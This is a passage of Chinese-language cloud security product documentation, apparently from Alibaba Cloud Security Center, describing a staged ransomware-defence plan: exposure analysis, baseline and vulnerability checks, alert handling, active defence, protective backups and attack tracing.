 RDP、SSH、Redis、MongoDB、MySQL、MS SQL Server等高危服务可以通过互联网直接访问。

服务器的操作系统和软件存在高危漏洞
 服务器的操作系统和应用服务软件存在高危漏洞,恶意攻击者通过上传加密勒索病毒或执行勒索操作,实现远程攻击。

防勒索安全防护方案概述

为了降低您的云服务资源受到加密勒索病毒攻击的概率,建议您按照防勒索安全防护的不同阶段,参照以下 安全防护方案进行部署或风险处理。

防护阶段	防护方案	描述	具体防护方案
事前阶段	进行安全配置检查	安全配置检查包括资产暴露分析、基线检 查、云平台配置检查、AK泄露检测,主要目 的如下: • 确保关键业务的账号安全,避免服务器、 数据库账号使用弱口令或无口令。 • 确保业务无未授权访问风险、误风险服务 暴露在互联网上。	资产暴露分析 基线检查 云平台配置检查 AK泄漏检测
	及时扫描服务器上 存在的漏洞并对漏 洞进行修复	云安全中心漏洞修复功能,可以检测出服务 器上存在的风险漏洞,建议您及时对检查出 的高风险漏洞进行修复。	漏洞周期检测配置 漏洞修复优先级 漏洞公网可以利用 情况
	为服务器和数据库 创建勒索防护策略	云安全中心针对勒索病毒,提供了服务器防 勒索和数据库防勒索两大功能,帮您解决服 务器、数据库被勒索病毒入侵的后顾之忧。	防勒索备份
	开启主动防御相关 功能	云安全中心的主动防御能力为您自动拦截常 见病毒、恶意网络连接和网站后门连接,并 设置诱饵捕获勒索病毒。病毒拦截功能可对 勒索病毒进行精准拦截,抑制勒索事件的发 生。	主动防御

防护阶段	防护方案	描述	具体防护方案
事中阶段	及时处理云安全中 心检测出的全告警 事件	云安全中心支持实时检测您资产中的安全告 警事件,覆盖网页防篡改、进程异常、网站 后门、异常登录、恶意进程等安全告警类 型。通过250+威胁检测模型,提供全面的安 全告警类型检测,帮助您及时发现资产中的 安全威胁、实时掌握您资产的安全态势。	安全告警处理
事后阶段	对被勒索病毒入侵 的资产数据进行备 份恢复	云安全中心的服务器防勒索功能和数据库防 勒索功能可为您的服务器或者数据库创建勒 索病毒防护策略,备份您的服务器或数据库 的数据。当您的服务器或数据库被勒索病毒 入侵后,您可以通过创建数据恢复任务来恢 复被勒索病毒入侵的数据。	防勒索备份
	对勒索病毒进行攻 击溯源	云安全中心的攻击溯源功能,基于客户端全 面数据采集结合云端图计算引擎,可以智能 还原出攻击路径,帮助您详细了解勒索病毒 入侵的过程和链路。	攻击溯源

防勒索安全防护方案的详细说明和涉及的相关操作见下文。

资产暴露分析

通过资产暴露分析功能,您可以收敛公网暴露面,降低被攻击者或勒索病毒软件从公网入侵的风险,对于已 经存在的公网暴露风险应列为最高优先级进行处理。具体操作,请参见资产暴露分析。

• 暴露组件分析

您可以通过查看资产暴露分析功能中的暴露组件,检查是否存在组件或服务(如Redis、MongoDB、 Elasticsearch等)未预期地暴露到公网。若发现此类暴露组件,可将对应组件的公网暴露链路切段,如增 加对应的安全组配置仅允许特定IP段访问。

弱口令暴露分析
 弱口令暴露在公网上极易导致系统被入侵,对于暴露在公网的弱口令风险需要紧急修复。

基线检查

基线检查支持弱口令、未授权访问、历史漏洞和配置红线的立体巡检,这些基线已经包含在默认检查策略中,完成系统、数据库和中间件的安全效果基线的修复加固能有效预防针对相关服务的勒索风险。具体操作,请参见基线检查概述。

云平台配置检查

云安全中心的云平台配置检查功能从身份认证及权限、网络访问控制、数据安全、日志审计、监控告警、基础安全防护六个维度为您提供云产品安全配置的检查,帮助您及时发现您的云产品配置风险并提供相应的修复方案。强烈建议您修复云平台配置检查中的高风险检查项。具体操作,请参见云平台配置检查概述。

AK泄漏检测

云安全中心的AK泄漏检测功能,可以实时检测GitHub等平台公开源代码中的用户登录名和密码信息,识别出 您资产的用户名和密码是否有泄露,并提供相应的告警,帮助您及时发现并处理可能外泄的AK信息。具体操 作,请参见AK泄露检测。

漏洞周期检测配置

建议您开启应用漏洞检测功能,并配置周期检测,检测周期配置为最短周期(当前最短周期为每隔3天)。 另外请确认漏洞白名单中的漏洞均为确实需要加白的漏洞。具体操作,请参见漏洞管理设置。

漏洞修复优先级

应用漏洞检测分为合规视角和真实风险视角,真实风险视角下展示的漏洞均为漏洞细节已公开,且PoC、 EXP均可在互联网上方便获得的漏洞。这些漏洞均可以被攻击者或勒索病毒有效利用。因此真实风险模式下 展示的漏洞均需高优先级修复,修复的先后顺序可参考紧急程度从高到低进行修复。无公网暴露服务相关的 漏洞也需进行修复,避免被攻击者或勒索病毒利用实现内网横向移动,进一步扩大影响面。具体操作,请参见漏洞修复优先级。

漏洞公网可以利用情况

当漏洞数量过多,且没有足够资源完成漏洞修复工作时,可以优先完成互联网边界服务相关漏洞的修复和处置。保证边界服务的安全性,为后续内部其余漏洞的修复赢得更多时间。修复和处置方式如下:

● 漏洞修复

按照漏洞详情中的修复建议完成漏洞修复。

• 临时处置

点击安全组ID或网元实例ID,跳转到对应安全组或对应SLB、NAT配置界面,去掉将服务暴露到公网的端口转发配置,或配置安全组仅允许特定IP或IP段访问该服务(临时处置不等于漏洞修复,后续仍需修复该漏洞)。

关于漏洞修复的具体操作,请参见漏洞修复概述。

安全告警处理

云安全中心支持实时检测您资产中的安全告警事件,覆盖网页防篡改、进程异常、网站后门、异常登录、恶 意进程等安全告警类型。通过250+威胁检测模型,提供全面的安全告警类型检测,帮助您及时发现资产中的 安全威胁、实时掌握您资产的安全态势。

您可以按照以下步骤处理勒索病毒相关的告警事件:

- 1. 登录云安全中心控制台。
- 2. 在左侧导航栏,选择威胁检测 > 安全告警处理。
- 3. 在安全告警处理处理页面的告警事件列表中,定位到勒索病毒相关的告警事件,单击操作列的处理。
- 4. 在当前告警事件处理的对话框中,设置处理方式为病毒查杀并选中隔离该进程的源文件。
- 5. 单击下方立即处理。

隔离进程源文件,可防止该程序再次启动。

6. 登录该告警事件中受影响的服务器,确认crontab中是否存在异常的计划任务。

如果存在异常的计划任务,需要删除或注释掉异常的计划任务。



主动防御

云安全中心的主动防御能力为您自动拦截常见病毒、恶意网络连接和网站后门连接,并设置诱饵捕获勒索病毒。病毒拦截功能可对勒索病毒进行精准拦截,在事前抑制勒索事件的发生。如何开启病毒拦截功能,请参见主动防御。

另外,勒索病毒可能会破坏云安全中心客户端,因此建议开启客户端自保护功能。开启客户端自保护的具体 操作,请参见客户端自保护。

防勒索备份

云安全中心针对勒索病毒,提供了服务器防勒索和数据库防勒索两大功能,帮您解决服务器、数据库被勒索 病毒入侵的后顾之忧。

● 服务器防勒索

无论您的服务器是阿里云服务器或非阿里云服务器、服务器使用的是专有网络或者经典网络,您都可以使 用云安全中心的服务器防勒索功能为您的服务器创建勒索病毒防护策略。为您的服务器创建防护策略后, 云安全中心会自动备份您服务器防护目录下的数据。如果您的服务器数据被勒索病毒入侵,您可以随时恢 复已备份的数据,避免勒索病毒对您的业务产生影响。具体操作,请参见创建防护策略、创建恢复任务。

• 数据库防勒索

您可以为安装在阿里云ECS服务器上的MySQL数据库、Oracle数据、SQL Server数据库这三种数据库创建勒 索病毒防护策略,备份您数据库的数据。如果您的数据库数据被勒索病毒入侵,您可以随时恢复已备份的 数据,避免勒索病毒对您的业务产生影响。具体操作,请参见创建防护策略、创建恢复任务。

相关配置建议

- 备份数据会占用您的网络带宽,建议您将备份数据的开始时间设置到业务低峰时段。您可以通过修改防护 策略的数据备份开始时间设置合理的数据备份时间(建议在业务低峰期开始、并避开整点)。因初次全 量备份或增量备份文件较多,备份活动有可能持续数个小时。
- 建议规划好您服务器上的目录,在创建勒索防护策略时只备份有价值的数据目录,将无价值的数据排除在 备份目录之外。设置为备份指定目录,不仅有利于节省防勒索备份容量,还可以降低对服务器性能的占 用。
- 建议定期检查防勒索备份容量,确保容量充足、避免超量使用。需要注意的是,备份容量超量后若不扩容 或手动清理备份数据释放防勒索容量,勒索防护策略会停止备份,并且超过备份数据保留时间后会自动 清理可恢复数据版本,导致备份防护失效。
- 若挂载了NAS、OSS到ECS的目录上,则NAS、OSS存储的数据也会被备份。建议排除挂载目录进行备份, 或指定挂载目录中的必要数据进行备份。
- 碎片文件过多,可能会导致磁盘缓存、日志空间、和内存占用较高,建议您定期清理磁盘空间。清理磁盘
 空间的具体操作,请参见清理防勒索备份占用的服务器的磁盘空间。

攻击溯源

云安全中心的攻击溯源功能,基于客户端全面数据采集结合云端图计算引擎,可以智能还原出攻击路径,帮助您详细了解勒索病毒入侵的过程和链路。具体操作,请参见<u>攻击溯源</u>。